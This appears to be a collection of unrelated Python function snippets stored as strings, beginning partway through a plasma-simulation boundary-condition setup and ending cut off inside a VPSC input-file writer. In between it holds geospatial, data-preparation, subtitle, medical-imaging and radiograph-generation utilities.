'absorbing'\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: %s\" % BC['phi'][var]['upper'].upper()\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g. an upper boundary condition set on phi as BIAS must have the upper boundary condition on f as ABSORBING\\n \"\n raise InputError('An upper boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n\n elif BC['phi'][var]['type'] == 'SYMMETRIC_SELF-CONSISTENT' or BC['phi'][var]['type'] == 'SYMMETRY_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_LNBC'\n\n # We default to a LDBC_LNBC solver, both boundary conditions on left edge, entries 0 (Dirichlet) and 1 (Neumann)\n # cf. DECSKS-04 notebook for more details:\n #\n # https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb\n #\n # Dirichlet condition, set reference potential phi = 0\n phi_BC[var][0] = 0. # reference potential set to zero\n # Neumann condition, dphi = 0 for symmetry\n phi_BC[var][1] = 0.\n\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n # By virtue of the setup, the above enforcements on the lower boundary ensures this unenforced upper Neumann BC is\n # satisfied automatically given the relationship that Neumann BCs are fixed by due to the Poisson equation\n #\n # see github.com/dsirajud/IPython-Notebooks/DECSKS-04 for more information (final few sections of the notebook)\n #\n # Thus, we do not need to actually enforce the wall potential directly in terms of the charge accumulated for this boundary; however,\n # we initialize and track the objects here so that the data can be accessed, analyzed or otherwise plotted, should the user wish\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: %s\" % BC['phi'][var]['upper'].upper()\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g. an upper boundary condition set on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n elif BC['phi'][var]['type'] == 'SELF-CONSISTENT_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_LNBC'\n\n # We default to a LDBC_LNBC solver, both boundary conditions on left edge, entries 0 (Dirichlet) and 1 (Neumann)\n # cf. DECSKS-04 notebook for more details:\n #\n # https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb\n #\n # Dirichlet condition, set reference potential phi = 0\n phi_BC[var][0] = 0. # reference potential set to zero\n # Neumann condition, dphi = 0 for symmetry\n #phi_BC[var][1] = - 6 * var.width * sim_params['sigma'][var]['lower'], changes with time step\n\n\n if BC['f'][var]['lower'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities\n sigma[var]['lower'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['lower'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi on variable %s: SELF-CONSISTENT\" % var\n print \"lower boundary condition on f on variable %s: %s\\n\\n\" % (var, BC['f'][var]['lower'].upper())\n print \"\\ne.g. a lower boundary condition set on phi as SELF-CONSISTENT must have the lower boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('A lower boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n # By virtue of the setup, the above enforcements on the lower boundary ensures this unenforced upper Neumann BC is\n # satisfied automatically given the relationship that Neumann BCs are fixed by due to the Poisson equation\n #\n # see github.com/dsirajud/IPython-Notebooks/DECSKS-04 for more information (final few sections of the notebook)\n #\n # Thus, we do not need to actually enforce the wall potential directly in terms of the charge accumulated for this boundary; however,\n # we initialize and track the objects here so that the data can be accessed, analyzed or otherwise plotted, should the user wish\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: SELF-CONSISTENT\"\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g an upper boundary condition set on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n # else: boundary conditions have already been checked for valid inputs, no invalid input will be encountered\n\n # --------------------------------------------------------------------------\n # ELECTRIC POTENTIAL PHI FUNCTION HANDLE STRING and BOUNDARY CONDITION TYPE FUNCTION HANDLE STRING\n #\n # currently only 1D1V, only one handle needed. When this will be generalized, can make a dict objects with keys corresponding\n # to each active configuration variable\n #\n # The forms of each string call their associated method per the boundary conditions specified by the user in params_boundaryconditions.dat,\n # based on the boundary conditions specified by the user, one of the following will be created:\n #\n # compute_electric_potential_phi_handle[var] =\n #\n # DECSKS.lib.fieldsolvers.Poisson_6th_PBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_UDBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_UNBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LNBC_UDBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_LNBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_UDBC_UNBC (<-- available, but not used in any current combination of BCs)\n #\n #\n # and, one of the following\n #\n # distribution_function_boundarycondition_handle[var]['lower'] =\n #\n # DECSKS.lib.boundaryconditions.absorbing_lower_boundary\n # DECSKS.lib.boundaryconditions.collector_lower_boundary\n # DECSKS.lib.boundaryconditions.symmetric_lower_boundary\n #\n # NOTE: if 'periodic' has been specified, everything is\n # handled in the orchestrator, distribution_function_boundarycondition_orchestrator\n # which would take on the string value = 'DECSKS.lib.boundaryconditions.periodic\n\n\n distribution_function_boundarycondition_prefix = 'DECSKS.lib.boundaryconditions'\n distribution_function_boundarycondition_handle = {}\n for var in phasespace_vars:\n if BC['f'][var]['type'] == 'periodic':\n pass\n else:\n distribution_function_boundarycondition_handle[var] = {}\n\n distribution_function_boundarycondition_handle[var]['lower'] = \".\".join((distribution_function_boundarycondition_prefix, BC['f'][var]['lower']))\n distribution_function_boundarycondition_handle[var]['lower'] = \"_\".join((distribution_function_boundarycondition_handle[var]['lower'], 'lower_boundary'))\n\n distribution_function_boundarycondition_handle[var]['upper'] = \".\".join((distribution_function_boundarycondition_prefix, BC['f'][var]['upper']))\n distribution_function_boundarycondition_handle[var]['upper'] = \"_\".join((distribution_function_boundarycondition_handle[var]['upper'], 'upper_boundary'))\n\n\n compute_electric_potential_phi_handle = {}\n compute_electric_potential_phi_prefix = \"DECSKS.lib.fieldsolvers.Poisson_6th_\"\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER': # uses a Gauss law solver to find E directly, which is called by the orchestrator on the fieldsolver\n pass\n else: # computes the electric field E by differentiating phi in an orchestrator fieldsolver function (string handle constructed above)\n # inside the orchestrator, a particular Poisson solver is called according with the boundary conditions indicated in params_boundaryconditions.dat\n compute_electric_potential_phi_handle[var] = compute_electric_potential_phi_prefix + BC['phi'][var]['type']\n else:\n pass\n\n # in the future, can generalize this to multiple dimensions by making this a dict with keys ['x', 'y', 'z']\n # currently just on 1D1V and expecting an 'x' variable to be evolved in configuration\n\n if 'x' not in phasespace_vars:\n raise NotImplementedError('Current 1D1V version of DECSKS is expecting x to be the active configuration variable. Please revise the intended simulation so that x is the symbol chosen in params.dat.')\n else:\n if HOC['x'] == 'FOURIER': # uses a Gauss solver to find E directly\n Poisson_6th_order_FD_solver_matrices = None\n\n else: # uses a Poisson solver to find phi, then differentiates to obtain E\n Poisson_6th_order_FD_solver_matrices = assemble_Poisson_6th_order_FD_solver_matrices(Nx_active, BC)\n\n derivative_method = {}\n derivative_method_prefix = 'DECSKS.lib.derivatives'\n for var in phasespace_vars:\n derivative_method[var] = \".\".join((derivative_method_prefix, HOC[var].lower()))\n\n sim_params = dict(\n N = N, HOC = HOC,\n derivative_method = derivative_method,\n Nx = Nx, ax = ax, bx = bx,\n Ny = Ny, ay = ay, by = by,\n Nz = Nz, az = az, bz = bz,\n Nvx = Nvx, avx = avx, bvx = bvx,\n Nvy = Nvy, avy = avy, bvy = bvy,\n Nvz = Nvz, avz = avz, bvz = bvz,\n Nt = Nt, T = T,\n phasespace_vars = phasespace_vars,\n numdims = numdims,\n active_dims = active_dims,\n total_dims = total_dims,\n density = density,\n mu = mu,\n split_scheme = split_scheme,\n splitting = splitting,\n plot_params = plot_params,\n record_outputs = record_outputs,\n outfiles = outfiles,\n BC = BC, # boundary condition types on all phase space variables on distribution function f and phi\n phi_BC = phi_BC, # dictionary containing boundary value vector for electric potential used in Poisson solve, e.g. phi_BC['x']\n sigma = sigma,\n sigma_n = sigma_n, # this was put in for charge history plots\n distribution_function_boundarycondition_handle = distribution_function_boundarycondition_handle, # dictionary with keys (var in phasespace_vars), which are keys to a subdict with keys 'lower', 'upper'\n distribution_function_boundarycondition_orchestrator_handle = distribution_function_boundarycondition_orchestrator_handle, # dictionary with keys (var in phasespace_vars)\n compute_electric_potential_phi_handle = compute_electric_potential_phi_handle,\n compute_electric_field_orchestrator_handle = compute_electric_field_orchestrator_handle,\n I_alternating = I_alternating, # identity matrix with alternating signs according to row, used in computing correctors c\n A_matrix = A_matrix, # Matrices of Bernoulli numbers for HOC\n W = W,\n W_dn1_LTE6 = W_dn1_LTE6,\n Xi = Xi, # spectral differentiation operator matrix (1j*xi[i,j]) ** q\n xi = xi, # wave number vector\n Poisson_6th_order_FD_solver_matrices = Poisson_6th_order_FD_solver_matrices\n )\n\n infile.close()\n\n # --------------------------------------------------------------------------\n # Before return, broadcast notification\n # regarding start of simulation and order of solver\n\n print \"\\nStarting 1D1V Vlasov-Poisson simulation\"\n print \"\\nadvection solver: LTE order %d\" % (N+1)\n print \"\\nwill step through %d-dimensional solution in variables: %s\\n\" % (len(phasespace_vars), phasespace_vars)\n for var in phasespace_vars:\n print \"high order correction method on %s: %s\" % (var, HOC[var])\n\n print \"\\n\"\n return sim_params", "def shapefileToRaster(in_shapefile, model_raster, out_dir, name_override=None, zone_field:str = None, dtype = None, *args, **kwargs) -> str:\n\t# correct variable names\n\tshapefile_path = in_shapefile\n\t# get out_path\n\tif name_override:\n\t\tout_path = os.path.join(out_dir,name_override)\n\telse:\n\t\tin_base = os.path.splitext(os.path.basename(in_shapefile))[0]\n\t\tmodel_ext = os.path.splitext(model_raster)[1]\n\t\tout_path= os.path.join(out_dir,in_base+\"_RASTER\"+model_ext)\n\t# read file\n\tshp = gpd.read_file(shapefile_path)\n\twith rasterio.open(model_raster,'r') as rst:\n\t\tmeta = rst.meta.copy()\n\n\t# this is where we create a generator of geom, value pairs to use in rasterizing\n\tif zone_field is not None:\n\t\tzone_vals = []\n\t\tfor i in range(len(shp)):\n\t\t\tzone_vals.append(shp.at[i,zone_field])\n\t\tzone_codes = [i for i, val in enumerate(zone_vals)]\n\t\tshapes = ((geom,val) for geom, val in zip(shp.geometry,zone_codes))\n\telse:\n\t\tshapes = ((geom,1) for geom in shp.geometry)\n\n\t# set data type\n\tif dtype:\n\t\tmeta.update(dtype=dtype)\n\telif zone_field:\n\t\tmeta.update(dtype=rasterio.dtypes.get_minimum_dtype(zone_codes))\n\telse:\n\t\tmeta.update(dtype=\"int16\")\n\n\ttry:\n\t\tout = rasterio.open(out_path, 'w+', **meta)\n\t# merra-2 files have a very high nodata value, beyond the range of int32.\n\t# This block catches the resulting ValueError and swaps in the minimum\n\t# allowable data type. Nice of rasterio to have such a function.\n\texcept ValueError:\n\t\tmeta.update(dtype=rasterio.dtypes.get_minimum_dtype([meta['nodata']]))\n\t\tout = rasterio.open(out_path, 'w+', **meta)\n\t\tout_arr = out.read(1)\n\t\tburned = features.rasterize(shapes=shapes, fill=0, out=out_arr, transform=out.transform)\n\t\tout.write_band(1, burned)\n\tout.close()\n\n\treturn out_path", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n conn = sqlite3.connect('../raw/td_V2.db')\n git_commits = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS\",conn)\n szz_fault_inducing_commits = pd.read_sql_query(\"SELECT * FROM szz_fault_inducing_commits\",conn)\n refactoring_miner = pd.read_sql_query(\"SELECT * FROM refactoring_miner\",conn)\n refactoring_miner = refactoring_miner[refactoring_miner[\"COMMIT_HASH\"].isin(git_commits[\"COMMIT_HASH\"])]\n git_commits_changes = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS_CHANGES\", conn)\n git_commits_changes = git_commits_changes[git_commits_changes[\"COMMIT_HASH\"].isin(refactoring_miner[\"COMMIT_HASH\"])]\n\n preprocess(git_commits, szz_fault_inducing_commits, refactoring_miner, git_commits_changes)", "def create_sample_vectors(cleaned_data_directory, out_vectors_path):\n vectors = []\n\n for filename in os.listdir(cleaned_data_directory):\n if not filename.endswith(\".txt\"):\n continue\n\n path = os.path.join(cleaned_data_directory, filename)\n f = open(path, mode='r', encoding='utf8')\n\n print(\"Processing\", path)\n\n lang = filename[:2]\n lang_number = language_codes.index(lang)\n\n print(f\"\\tLanguage: {lang} ({lang_number})\")\n print(\"\\tReading...\", end=' ')\n\n file_content = f.read()\n content_length = len(file_content)\n\n print(\"done.\")\n print(\"\\tExtracting vectors...\", end=' ')\n\n sample_start_index = 0\n count = 0\n\n while sample_start_index + text_sample_size < content_length:\n sample = get_sample(file_content, sample_start_index, text_sample_size)\n input_vector = build_input_vector(sample)\n vector = input_vector + [lang_number]\n vectors.append(vector)\n sample_start_index += text_sample_size\n count += 1\n\n print(\"done.\")\n print(f\"\\tExtracted {count} vectors.\")\n\n del file_content\n\n print(f\"Total {len(vectors)} vectors.\")\n\n np_vectors = np.array(vectors, dtype=np.uint16)\n np.random.shuffle(np_vectors)\n\n print(f\"Converted to NumPy array, shape: {np_vectors.shape}.\")\n\n np.savez_compressed(out_vectors_path, data=np_vectors)\n\n print(f\"Saved to {out_vectors_path}.\")", "def vtt_to_srt(str_name_file: str):\n file_contents: str = read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def make_voxels_isometric(input_file):\n import os\n import nibabel as nb\n from mindboggle.utils.utils import execute\n\n # Load image volume\n img = nb.load(input_file)\n lenx, leny, lenz = img.shape\n if lenx != leny or lenx != lenz or leny != lenz:\n\n # Pad smaller dimensions\n max_dim = max([lenx, leny, lenz])\n padx = max_dim - lenx\n pady = max_dim - leny\n padz = max_dim - lenz\n\n # Save padded output\n out_file = 'isometric_' + os.path.basename(input_file)\n pad_dims = '{0}x{1}x{2}vox'.format(padx, pady, padz)\n cmd = ['c3d', input_file, '-pad 0x0x0vox', pad_dims, '-o ', out_file]\n execute(cmd)\n\n # Resample output\n max_dims = '{0}x{1}x{2}'.format(max_dim, max_dim, max_dim)\n cmd = ['c3d', out_file, '-resample', max_dims, '-o ', out_file]\n execute(cmd)\n\n else:\n out_file = input_file\n\n return out_file", "def drr(input_filename,output_directory,calibration_files,output_extension,threshold,min_out,max_out,default_pixel_value,rot,t,cor,n_cam,res,size,transformed_vol,verbose):\n \n click.echo(' inputFileName : {}'.format(input_filename))\n click.echo(' out_directory : {}'.format(output_directory))\n click.echo(' outputExtension : {}'.format(output_extension))\n click.echo(' Verbose Status : {}'.format(verbose))\n click.echo(' Pixel Size : {}'.format(res))\n click.echo(' Output image Size : {}'.format(size))\n click.echo(' Translation : {}'.format(t))\n click.echo(' Rotation : {}'.format(rot))\n click.echo(' Centre of Rotation : {}'.format(cor))\n click.echo(' Threshold : {}'.format(threshold))\n click.echo(' Number of Cameras : {}'.format(n_cam)) \n click.echo(' Minimum Out : {}'.format(min_out))\n click.echo(' Maximum Out : {}'.format(max_out))\n click.echo(' Calibration Files : {}'.format(calibration_files)) \n \n if len(calibration_files) != n_cam :\n raise Exception('Number of Calibration files', len(calibration_files),'do not correspond with the number of Cameras',n_cam)\n \n #%%------------------ Starting the main body of the code ---------------- \n # -------------------- Reader -------------------------\n InputPixelType = itk.ctype(\"short\")\n OutputPixelType = itk.ctype(\"short\")\n ScalarType = itk.D\n DimensionIn = 3\n DimensionOut = 3\n \n InputImageType = itk.Image[InputPixelType , DimensionIn ]\n OutputImageType = itk.Image[OutputPixelType, DimensionOut]\n \n \n ReaderType = itk.ImageFileReader[InputImageType]\n reader = ReaderType.New()\n reader.SetFileName(input_filename)\n \n try:\n print(\"Reading image: \" + input_filename)\n reader.Update()\n print(\"Image Read Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! \\n\")\n print(ValueError)\n sys.exit()\n \n inputImage = reader.GetOutput()\n \n if verbose :\n print(inputImage)\n \n \n #%% ------------------ Transformation \n # This part is inevitable since the interpolator (Ray-cast) and resample Image\n # image filter uses a Transformation -- Here we set it to identity. \n TransformType = itk.CenteredEuler3DTransform[itk.D]\n transform = TransformType.New()\n \n transform.SetRotation(numpy.deg2rad(rot[0]),numpy.deg2rad(rot[1]),numpy.deg2rad(rot[2])) # Setting the rotation of the transform\n transform.SetTranslation(itk.Vector.D3(t)) # Setting the translation of the transform\n transform.SetComputeZYX(True) # The order of rotation will be ZYX. \n \n imOrigin = inputImage.GetOrigin() # Get the origin of the image.\n inRes = inputImage.GetSpacing() # Get the resolution of the input image.\n inSiz = inputImage.GetBufferedRegion().GetSize() # Get the size of the input image.\n \n center = itk.Point.D3(imOrigin) + numpy.multiply(inRes,inSiz)/2. # Setting the center of rotation as center of 3D object + offset determined by cor. \n \n transform.SetCenter(center) # Setting the center of rotation. \n \n if verbose :\n print(transform)\n \n #%% \n for ii in range(n_cam):\n imageCalibrationInfo = CalibrationUsingJointTrack.CalibrationTool() # Setting up the image calibration info class. \n imageCalibrationInfo.SetCalibrationInfo(calibration_files[ii]) # Assign the information from the calibration file to the imageCalibrationInfo class. \n \n spaceOutput= imageCalibrationInfo.GetPixelSize() # The resolution (spacing) along x,y,z directions of output image\n \n imageCalibrationInfo.SetOutputImageSize(size[0],size[1],1) # Setting the size of the output image. \n imageCalibrationInfo.SetGlobalOriginForImagePlane() # Setting the global origin of the output image. \n \n originOutput = imageCalibrationInfo.GetGlobalOriginForImagePlane() # Setting the output origin. \n \n directionOutput = imageCalibrationInfo.GetDirectionMatrix() # Direction of Image plane 3x3 matrix. \n focalPoint = imageCalibrationInfo.GetFocalPoint() # Position of the x-ray source. \n \n #%% ----------------- Ray Cast Interpolator \n # In this part the Ray Cast interpolator is defined and applied to the input\n # image data. \n \n InterpolatorType = itk.RayCastInterpolateImageFunction[InputImageType,ScalarType] # Defining the interpolator type from the template. \n interpolator = InterpolatorType.New() # Pointer to the interpolator\n \n interpolator.SetInputImage(inputImage) # Setting the input image data\n interpolator.SetThreshold(threshold) # Setting the output threshold\n interpolator.SetFocalPoint(itk.Point.D3(focalPoint)) # Setting the focal point (x-ray source location)\n interpolator.SetTransform(transform) # Setting the transform (here identity)\n \n if verbose:\n print(interpolator)\n #%%----------------- Resample Image Filter ------------------------\n # In this part the resample image filter to map a 3D image to 2D image plane with desired specs is designed\n \n FilterType = itk.ResampleImageFilter[InputImageType,OutputImageType] # Defining the resample image filter type. \n resamplefilter = FilterType.New() # Pointer to the filter\n resamplefilter.SetInput(inputImage) # Setting the input image data \n resamplefilter.SetDefaultPixelValue(default_pixel_value) # Setting the default Pixel value\n resamplefilter.SetInterpolator(interpolator) # Setting the interpolator\n resamplefilter.SetTransform(transform) # Setting the transform\n resamplefilter.SetSize([size[0],size[1],1]) # Setting the size of the output image. \n resamplefilter.SetOutputSpacing(itk.Vector.D3([spaceOutput[0],spaceOutput[1],1])) # Setting the spacing(resolution) of the output image. \n resamplefilter.SetOutputOrigin(originOutput) # Setting the output origin of the image\n Functions.ChangeImageDirection(oldDirection=resamplefilter.GetOutputDirection(),newDirection=directionOutput,DimensionOut=3) # Setting the output direction of the image --- resamplefilter.SetImageDirection(args) was not working properly\n \n resamplefilter.Update() # Updating the resample image filter.\n \n if verbose:\n print(resamplefilter)\n #%%---------------- Rescaler Image Filter --------------------------\n RescalerFilterType = itk.RescaleIntensityImageFilter[InputImageType,OutputImageType] # Defining the rescale image filter. \n rescaler = RescalerFilterType.New() # Pointer to the rescale filter\n rescaler.SetOutputMinimum(min_out) # Minimum output\n rescaler.SetOutputMaximum(max_out) # Maximum output \n rescaler.SetInput(resamplefilter.GetOutput()) # Setting the input to the image filter. \n rescaler.Update() \n \n if verbose:\n print(rescaler)\n \n #%% ------------------ Writer ------------------------------------\n # The output of the resample filter can then be passed to a writer to\n # save the DRR image to a file.\n WriterType = itk.ImageFileWriter[OutputImageType]\n writer = WriterType.New()\n \n outputPath = os.path.join(output_directory,'Cam')+str(ii+1)\n \n if not os.path.exists(outputPath):\n os.mkdir(outputPath)\n \n if ii == 0:\n time = datetime.datetime.now() \n dummy = ('rx'+str(int(rot[0]))+'ry'+str(int(rot[1]))+'rz'+str(int(rot[2]))+'tx'\n + str(int(t[0]))+'ty'+str(int(t[1]))+'tz'+str(int(t[2]))+'y'+str(time.year)+'m'+str(time.month)\n +'d'+str(time.day)+'hr'+str(time.hour)+'m'+str(time.minute)+'s'+str(time.second)+ output_extension)\n \n outputName = 'Cam'+str(ii+1)+dummy\n output_filename = str(os.path.join(outputPath,outputName))\n \n writer.SetFileName(output_filename)\n # writer.SetFileName('/Volumes/Storage/Payam/Desktop/output.nii') \n writer.SetInput(rescaler.GetOutput())\n \n try:\n print(\"Writing image: \" + output_filename)\n writer.Update()\n print(\"Image Printed Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! \\n\")\n print(ValueError)\n sys.exit()\n \n \n # Writing the transformed volume\n if transformed_vol:\n WriterType=itk.ImageFileWriter[InputImageType]\n writer3d=WriterType.New()\n \n output_filename3d = os.path.join(output_directory,'TransformedVolume'+output_extension)\n writer3d.SetFileName(output_filename3d)\n writer3d.SetInput(resamplefilter.GetOutput())\n \n try:\n print(\"Writing the transformed Volume at : \" + output_filename3d)\n writer.Update()\n print(\"Volume Printed Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! \\n\")\n print(ValueError)\n sys.exit()", "def vpsc_in(\r\n ## # elem, ph and vol fraction of phases.\r\n ## and ishape for flag for morphology updates\r\n nelem=1, nph=1, wph =[1.0, 0.0], ishape=[0,],\r\n\r\n #framgmentation options and critical value limit \r\n # in distortion of the inclusion \r\n # as well as ellipsoid description: orientation and \r\n # principal lengths of'em\r\n fragmentn = [0,0], crit = [25,25],\r\n ellipangl = [[0., 0., 0.],[0.,0.,0.]],\r\n ellipaxes = [[1., 1., 1.],[1.,1.,1.]],\r\n \r\n # vpsc7.in file name (fixed)\r\n # texture, singlecrystal and shape file names in list format\r\n vin_name = 'VPSC7.in',\r\n tfile= ['texture/500.tex',],\r\n sxfile=['sx/hijhiihb.sx',],\r\n fileaxes=['shape1.100', 'shape1.100'],\r\n\r\n ### precision settings for convergence prodcedure\r\n ##\r\n err=0.001, errd=0.001, errm=0.001, errso=0.01,\r\n nmxiter=100, exiter=100, initer=100,\r\n irsvar=0, xrsini=2, xrsfin=10, xrstep=2,\r\n\r\n ### post-mortem flags, texture component calc. flag.\r\n ## \r\n irecover = 0, isave=0, icubcomp = 0, nwrite = 0, \r\n\r\n ## Single crystal hardening rule (-2: dislocation, 0:Voce, 1: MTS, 2: composite)\r\n ihardlaw = 0, \r\n\r\n ## fluctuation flag\r\n iflu = 0,\r\n\r\n ## rate insensitive, interaction :(FC,aff,2:sec,3:neff,4:tan,5:SO)\r\n ## update flags for orient, grain shape, hardening, itran(youngung)\r\n ## nneigh (0 for no neighbors, 1 for pairs, etc.)\r\n iratesens = 0, interaction = 3, iupdate = [1,1,1,0], nneigh = 0, \r\n\r\n ## proce number and processes\r\n npro = None,\r\n prcs = [], #processes\r\n \r\n ishow=False\r\n ):\r\n try: os\r\n except: import os\r\n else: pass\r\n cwd = os.getcwd()\r\n\r\n # READ EXISITING 'vpsc7.in'\r\n if os.path.isfile(vin_name): #if there already exists the file!\r\n f_vin = file(vin_name, 'r')\r\n lines = f_vin.read()\r\n lines = lines.split('\\n')\r\n f_temp = file('%s.tmp'%vin_name, 'w')\r\n for i in lines:\r\n f_temp.writelines(i)\r\n f_temp.writelines('\\n')\r\n pass\r\n f_temp.close()\r\n f_vin.close()\r\n \"\"\"\r\n # DEL EXISITING 'vpsc7.in'\r\n f_vin.close()\r\n os.remove(vin_name)\r\n \"\"\"\r\n # MAKE NEW 'vpsc7.in'\r\n f_vin = file(vin_name, 'w')\r\n f_vin.writelines('%i nelem\\n'%(nelem))\r\n f_vin.writelines('%i nph\\n'%(nph))\r\n for i in range(nph):\r\n f_vin.writelines('%f '%(wph[i]))\r\n f_vin.writelines(' wph[i]\\n')\r\n for i in range(nph): \r\n f_vin.writelines('*** INFORMATION ABOUT PHASE #%i\\n'%(i+1))\r\n f_vin.writelines('%i %i %i'%(ishape[i], fragmentn[i], crit[i]))\r\n f_vin.writelines(' ishape, fragmentn, crit aspect\\n')\r\n f_vin.writelines('%f %f %f'%(ellipaxes[i][0], \r\n ellipaxes[i][1], \r\n ellipaxes[i][2]))\r\n f_vin.writelines(' initial ellipsoid ratios (dummy if ishape=4)\\n')\r\n f_vin.writelines('%f %f %f'%(ellipangl[i][0], \r\n ellipangl[i][1], \r\n ellipangl[i][2]))\r\n f_vin.writelines(' init Eul ang ellips axes(dummy if ishape=3,4)\\n')\r\n # WRITES TEXTURE FILE\r\n f_vin.writelines('----------- filetext\\n')\r\n f_vin.writelines(tfile[i]+'\\n')\r\n f_vin.writelines('----------- sxfile\\n')\r\n # WRITES SINGLE CRYSTAL FILE\r\n f_vin.writelines(sxfile[i]+'\\n')\r\n # WRITES SHAPE FILE\r\n f_vin.writelines('----------- fileaxes (dummy if ishape=0) \\n')\r\n f_vin.writelines('%s \\n'%(fileaxes[i]))\r\n\r\n\r\n #### precision control block ###\r\n f_vin.writelines('*** PRECISION SETTINGS FOR')\r\n f_vin.writelines(' CONVERGENCE PROCEDURES (default values)\\n')\r\n f_vin.writelines('%f %f %f %f'%(err, #err\r\n errd, \r\n errm,\r\n errso))\r\n f_vin.writelines(' errs,errd,errm,errso\\n')\r\n f_vin.writelines('%i %i %i %25s'%( nmxiter, exiter, initer,' '))\r\n f_vin.writelines('itmax: max # of iter, external, internal and SO loops\\n')\r\n f_vin.writelines('%i %i %i %i %30s'%(irsvar, xrsini, xrsfin, xrstep,' '))\r\n f_vin.writelines('irsvar & xrsini, xrsfin, xrstep (dummy if irsvar = 0) \\n')\r\n f_vin.writelines(\"%i ibcinv (0: don't use <Bc>**-1, 1: use \\n\"%(1))\r\n f_vin.writelines('*** INPUT/OUTPUT SETTINGS FOR THE RUN(default is zero)\\n')\r\n f_vin.writelines('%i irecover:read grain stats from POSTMORT.IN(1) OR NOT(0)\\n'%(irecover))\r\n f_vin.writelines(\"%i isave: write grain states in postmor.out at step 'isave'?\\n\"%(isave))\r\n f_vin.writelines(\"%i icubcompL calcuate fcc rolling components?\\n\"%(icubcomp))\r\n f_vin.writelines(\"%i nwrite (frequency of texture downloads)\\n\"%(nwrite))\r\n f_vin.writelines(\"*** MODELING CONDITIONS FOR THE RUN \\n\")\r\n f_vin.writelines(\"%i ihardlaw(0:VOCE, 1: MTS, 2: composite grain\\n\"%(ihardlaw))\r\n f_vin.writelines('%1i' %(iratesens))\r\n f_vin.writelines(' iratesens (0:rate insensitive, 1:rate sensitive) \\n')\r\n f_vin.writelines('%1i' %(interaction))\r\n f_vin.writelines(' interaction (0:FC,1:affine,2:secant,3:neff=10,4:tangent,5:SO) \\n')\r\n f_vin.writelines('%1i%3i%3i%3i'%(iupdate[0],iupdate[1],iupdate[2],iupdate[3]))\r\n f_vin.writelines(' iupdate: update ori, grain shape, hardening, itran \\n')\r\n f_vin.writelines('%1i'%(nneigh))\r\n f_vin.writelines(' nneigh (0 for no neighbors, 1 for pairs, etc.)\\n')\r\n f_vin.writelines('%i'%(iflu))\r\n f_vin.writelines(\" iflu(0:don't calc, 1: calc fluctuations\\n\")\r\n\r\n f_vin.writelines(\"*NUMBER OF PROCESSES\\n\")\r\n f_vin.writelines(\"%i \\n\"%(npro))\r\n f_vin.writelines(\"** (0,1: loadings, 2:pcys, 3:lankf, 4: RBR,\")\r\n f_vin.writelines(\"5:pcys_pl, 6: pysc_pl 6d(ix,iy, nprob, ang\")\r\n f_vin.writelines(\"( or if negative behave like pcys))) \\n\")\r\n for i in range(len(prcs)):\r\n f_vin.writelines(prcs[i]+'\\n')\r\n \r\n # Closure of the file\r\n f_vin.close() \r\n # -------------------\r\n\r\n # Printing-out the just-made-vpsc7.in file\r\n if ishow==True:\r\n if os.name=='nt' or os.name=='posix':\r\n print \"****** VPSC input file 